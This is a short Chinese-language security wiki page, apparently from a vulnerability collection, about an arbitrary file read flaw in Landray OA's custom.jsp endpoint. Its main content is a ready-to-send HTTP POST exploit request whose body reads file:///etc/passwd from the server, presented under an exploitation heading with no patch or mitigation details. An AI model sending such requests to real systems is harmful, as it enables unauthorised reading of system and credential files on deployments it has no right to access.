menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right --Vulnerability-main chevron_right 蓝凌OA custom.jsp 任意文件读取漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    蓝凌OA custom.jsp 任意文件读取漏洞.md
    501 B / 2021-05-21 09:14:38
        # 蓝凌OA custom.jsp 任意文件读取漏洞
    
    漏洞利用
    
    出现漏洞的文件為 custom.jsp, 请求包如下:
    
    ```
    POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
    Host:
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
    Content-Length: 42
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip
    
    var={"body":{"file":"file:///etc/passwd"}}
    ```
    
    
    ref:https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw
    
    links
    file_download